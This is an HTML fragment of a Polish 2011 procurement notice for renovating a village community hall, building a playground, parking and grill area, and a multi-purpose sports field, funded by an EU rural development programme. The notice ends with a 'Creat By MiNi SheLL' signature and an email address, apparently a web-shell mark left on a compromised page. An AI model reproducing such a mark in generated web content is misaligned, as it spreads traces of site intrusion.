<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt będzie finansowany z udziałem środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Oszarów Wiejskich w ramach Programu Rozwoju Obaszarów Wiejskich na lata 2007-2013 - działanie Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont i wyposażenie świetlicy wiejskiej, budowa placu zabaw oraz wykonanie miejsc postojowych i stanowiska na grill.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje wykonanie: 
ROBOTY WEWNĄTRZ BUDYNKU: 
Podczas wykonywania remontu pomieszczeń, przewiduje się wykonanie: 
- wydzielenie pomieszczenia gospodarczego, korytarza i wc dla niepełnosprawnych, poprzez wykonanie ścianek działowych z płyt gipsowo-kartonowych typu GKBI typu H2 firmy Norgips lub równoważnej (zielonych). Czyszczenie podłogi z desek poprzez szlifowanie a następnie trzykrotne pomalowanie desek lakierem bezbarwnym, 
- licowanie ścian wc (do wys. 2,0 m) oraz ściany w obrębie umywalki w pomieszczeniu socjalnym ( fartuch 1,5*1,5 ), płytkami glazurowanymi o wym. 20*25 cm na zaprawie klejowej z listwami wykończeniowymi, 
- wykonanie rozbiórki podłóg w pomieszczeniu, w którym zaplanowano wc, pomieszczenie gospodarcze i korytarz a także w pomiesz?czeniu socjalnym; po wykonaniu rozbiórki j.w. należy wykonać podbudowę pod posadzkę: warstwa gruzobetonu  gr. 15 cm, izolacja cieplna styropianem gr. 5 cm, folia izolacyjna, warstwa wyrównawcza gr. 5 cm. 
- ułożenie płytek gresowych 30*30 antypoślizgowych R 9 na posadzkach na zaprawie klejowej w pomieszczeniach: wc, gospodarczym, socjalnym, korytarzu i w klatce schodowej, ułożenie cokolików z płytek cokołowych ww. wymienionych pomieszczeniach, 
- wymianę stolarki okiennej drewnianej na PCV pięciokomorową i stolarki drzwiowej drewnianej na drewnianą, 
- malowanie we wszystkich pomieszczeniach ścian i sufitów farbą emulsyjną w kolorze uzgodnionym z Inwestorem, w poszczególnych pomieszczeniach należy pomalować lamperie farbą olejną w kolorze uzgodnionym z Inwestorem. 
REMONT BUDYNKU NA ZEWNĄTRZ: 
Projektuje się wymianę pokrycia dachu z blachy płaskiej montowanej na rąbek na blachę trapezową ( mały trapez), wymianę obróbek blacharskich ocynkowanych na powlekane w tym blachy podrynnowej, rynien i rur spustowych. 
Po wykonaniu rozbiórki pokrycia dachu należy rozebrać łaty i zamontować nowe łaty, ułożyć kontrłaty, ułożyć membranę da?chową a następnie blachę o małym trapezie. 
Na kominach należy wykonać tynki cementowo - wapienne i pomalować je farbą emulsyjną 3-krotnie oraz poprawić nakrywy na kominach. 
Po wymianie okien należy wykonać podokienniki z blachy powlekanej. 
INSTALACJA SANITARNA: 
Po wydzieleniu pomieszczenia wc oraz w pomieszczeniu socjalnym, rurami z polipropylenu należy doprowadzić wodę do zlewozmywaka, ubikacji i umywalki, a odprowadzenie ścieków wykonać rurami z PCV do pierwszej studzienki. 
Przyłącze kanalizacji sanitarnej, zbiornik nieczystości ciekłych i przyłącze wodociągowe będzie wykonane wg odrębnego opracowania. 
INSTALACJA ELEKTRYCZNA: 
W wydzielonych pomieszczeniach należy wykonać instalację elektryczną a w istniejących pomieszczeniach należy wymienić oprawy oświetleniowe. 
Po wykonaniu wymiany pokrycia dachu planuje się wykonać instalację odgromową. 
WYPOSAŻENIE ŚWIETLICY
1/ stół do tenisa stołowego - kolor niebieski, stół do użytku wewnątrz pomieszczeń, rozmiar 2740x1525x760 mm, płyta z drewna 19 mm, konstrukcja 36 mm, nogi 25x25 mm, możliwość przemieszczenia stołu, wyposażenie w 4 kółeczka, złożenie umożliwia grę jednego gracza, wyprodukowany zgodnie z normą EN 14468-1 Klasa B, stół powinien być wyposażony w uchwyty na siatkę oraz siatkę a także uchwyty na rakietki i piłeczki, sztuk - 1.
2/ stół do bilarda - o wymiarach min. 120 x 250 cm, pole gry z płyty kamiennej, sukno niebieskie o zwiększonym poziomie  poliestru (65%), 24 miesięcy gwarancji, metalowe nogi z możliwością regulacji, w zestawie pełny komplet do gry: 2 kije, 16 bil, 2 kredy, trójkąt, szczotka do sukna, odporny na wilgoć, kosze wykonane z wysokiej jakości eko-skóry, sztuk - 1.
3/ piłkarzyki - o wymiarach 139,2x75,6x86 cm, płyty boczne: 15 mm MDF szeroka na 35 cm, pole gry 118x68 cm z 9mm płyty MDF, punktacja manualna, 22 zawodników, 3 piłeczki w komplecie, drążki zawodników 16 mm chromowana stal, łożyska kulkowe, nogi: 11,8x11,8 z 12 milimetrowej płyty MDF, stopki z regulacją poziomu, sztuk - 1.
4/ lotki - tarcza z kompletem lotek, sztuk - 2.
5/ rakiety do tenisa ziemnego - amatorska, materiał: grafit, pow. min. 660 cm2, waga min. 265 g, sztuk - 4.
6/ wieża muzyczna - o mocy min. 2x50 W, w skład wchodzi: radio cyfrowe z RDS, odtwarzacz CD, standardy odtwarzania dźwięku: CD Audio, CD-R, CD-RW, MP3, WMA, magnetofon, kolor obudowy: srebrny, antena AM / FM, instrukcja obsługi w języku polskim, karta gwarancyjna, pilot,  sztuk - 1.
7/ stoliki świetlicowe - o wymiarach min. 80 cm x 80 cm, wytrzymała metalowa konstrukcja ramy, z rurki o przekroju min. fi 32 mm, lakierowana w kolorze czarnym lub stalowym, blat z płyty laminowanej o grubości min. 18 mm, w kolorze buk, okleinowanej PCV o grubości 2 mm, stopki plastikowe zabezpieczające podłoże przed porysowaniem, sztuk - 10.
8/ krzesła - typu Iso Black /lub równoważny/- wytrzymała metalowa konstrukcja ramy lakierowana w kolorze czarnym, tapicerowane siedzisko i oparcie w kolorze stalowym, sztuk - 40.
9/ szafa - trzydrzwiowa, zamykana, wykonana z  płyty wiórowej o grubości 1.8 cm,  melaminowanej, o podwyższonej trwałości, podwyższonej odporności na ścieranie. Wszystkie krawędzie elementów płytowych mebla (również niewidoczne) zabezpieczone doklejką z tworzywa sztucznego o grubości 2 mm, sztuk - 1.
WYKONANIE MIEJSC POSTOJOWYCH I STANOWISKA NA GRILL:
- STANOWISKA POSTOJOWE w tym: roboty ziemne, wykonanie podbudowy z piasku, z kruszywa i grysu oraz nawierzchni z kostki betonowej gr. 8 cm. 
- MIEJSCE GRILLOWANIA w tym: roboty ziemne, wykonanie podbudowy z piasku, z kruszywa i grysu, nawierzchni z kostki betonowej gr. 6 cm oraz wykonanie trawników. 
- WYPOSAŻENIE MIEJSCA GRILLOWANIA w ławki, stoły, grill, kosz. 
PLAC ZABAW
Będzie to teren o powierzchni 416m2 i nawierzchni trawiastej. Projektuje się ogrodzenie z drewnianych płotków - płotek kaliski średni PŁOJKAL 70 prod Inter-Flora Wrocław /lub równoważne/. Ogrodzenie będzie montowane do metalowych słupków kotwionych w betonowych fundamentach z betonu B-15 w rozstawie co 2 m. Fundamenty o wymiarach 25*25*25cm. Wyposażenie placu zabaw prod. Inter-Flora Wrocław / lub równoważne/ w tym: 
- tablica informacyjna TR1- l szt; 
- kosz na śmieci KOSZ/DR - 2szt; 
- ławka Ł2000 - 2 szt; 
- piaskownica PIAS/B - 1szt 
- huśtawka wagowa SHW SK1 - 1 szt; 
- huśtawka sprężynowa - 1szt; 
- zestaw zabawowy TOMEK - 1 szt 
- huśtawka podwójna SH2 - 1 szt; 
Urządzenia zabawowe zostaną złożone na miejscu budowy z modułów fabrycznych producenta i przytwierdzone do podłoża do marek montażowych zakotwionych w fundamentach betonowych przy pomocy śrub montażowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.30.00-7, 45.21.21.40-9, 45.23.32.00-1, 45.11.27.10-5, 45.26.23.00-4, 45.11.12.00-0, 45.44.21.00-8, 45.44.00.00-3, 45.43.00.00-0, 45.42.11.00-5, 45.31.00.00-3, 45.33.20.00-3, 45.31.23.11-0, 45.45.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa boiska wielofunkcyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BOISKO WIELOFUNKCYJNE z przeznaczeniem do koszykówki/siatkówki i tenisa ziemnego, obejmuje wykonanie: 
a/ PODBUDOWA nieprzepuszczalna o przekroju: 
- grunt rodzimy, 
- warstwa odsączająca z piasku gr. 15 cm,
- podbudowa z betonu B 25 gr. 15 cm. 
Podbudowę należy oddzielić od pozostałych elementów terenu za pomocą obrzeży betonowych o wym. 8x30x100 cm ustawionych na ławie betonowej z betonu B 20 z oporem. 
Warstwa odsączająca z piasku powinna być układana warstwowo z bardzo starannym ubijaniem i nawilżaniem piasku. Na ubitej warstwie piasku należy układać beton pochodzący z betoniarni z wymaganymi atestami. 
Podłoże z betonu powinno być wolne od zanieczyszczeń organicznych kurzu, błota, piasku itp. a następnie zaimpregnowane impregnatem poliuretanowym np. CONIPUR 74 lub równoważnym. 
Impregnat ma za zadanie stworzenia warstwy adhezyjnej i związanie luźnych cząsteczek podłoża. Podbudowa powinna być szorstka, nie posiadać odspojonych odłamków. 
Na płycie boiska należy wyprofilować dwustronny 0,7 % spadek. 
b/ NAWIERZCHNIA
Projektuje się nawierzchnię syntetyczną, poliuretanową,  bezspoinową, antypoślizgową, przepuszczalną dla wody, gdzie nawierzchnia składa się z warstwy nośnej z granulatu SBR o granulacji 1-4mm oraz warstwy użytkowej z systemu poliuretanowego z granulatem typu EPDM , gr. 2-3mm.Łączna grubość nawierzchni 13mm. W KOLORZE CEGLASTYM. 
 Łączna grubość nawierzchni 13 mm. 
c/ WYPOSAŻENIE BOISK slupki do siatkówki, słupki do siatkówki i tenisa z siatkami oraz stojaki do koszykówki z tablicą epoksydową, obręczą i siatką łańcuchową. 
d/ OGRODZENIE z siatki stalowej powlekanej z bramą stalowa z kształtowników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.34.20.00-6, 45.23.32.60-9, 45.11.27.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com